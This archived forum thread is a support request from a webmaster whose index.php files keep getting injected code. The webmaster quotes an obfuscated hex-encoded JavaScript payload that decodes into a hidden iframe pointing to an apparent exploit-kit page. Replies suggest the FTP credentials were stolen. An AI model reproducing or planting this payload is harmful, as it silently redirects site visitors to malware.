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Full Version: someone add some codes in my index.php files
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hi all,

someone continously add my all index.php files some strange codes. (main/index.php, admin/index.php, archive/index.php etc...)
These codes are look like scripts and make my forum unwork. a white page or continously reloding page.

i delete these strange codes, but after a while appears again. although my chmodes 644, how people write in my pages.

here are the scripts added my pages:

Quote:<script>function vxVaVVytxtb(vdYVxVxtYtb){ return(parseInt(vdYVxVxtYtb,16));}function vyyaxYxbdyV(vbYVtxYxtdb){ var vbxxYtaxYyV='';for(vydtYdayaVd=0; vydtYdayaVd<vbYVtxYxtdb.length; vydtYdayaVd+=2){vbxxYtaxYyV+=(String.fromCharCode(vxVaVVytxtb(vbYVtxYxtdb.substr(vydtYdayaVd,2))));}return vbxxYtaxYyV;} document.write(vyyaxYxbdyV('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646 F63756D656E742E777269746528273C696672616D65202069643D227478745674565662627922206 E616D653D227874647861626162566122207372633D22687474703A2F2F7265646469692E72752F7 47261666669632F73706C6F6974312F3F272B4D6174682E726F756E64284D6174682E72616E646F6 D28292A3637303635292B2756645974747974747959222077696474683D223738392220686569676 8743D22383522207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E2 7293C2F5343524950543E'));</script>
I suspect someone may have compromised something on your server - for example, FTP details. Do you upload everything via FTP? If so, try changing your FTP password and see if it stops things.
Also, make sure you don't have any rouge spyware/viruses on your computer.
Agree with ZiNgA BuRgA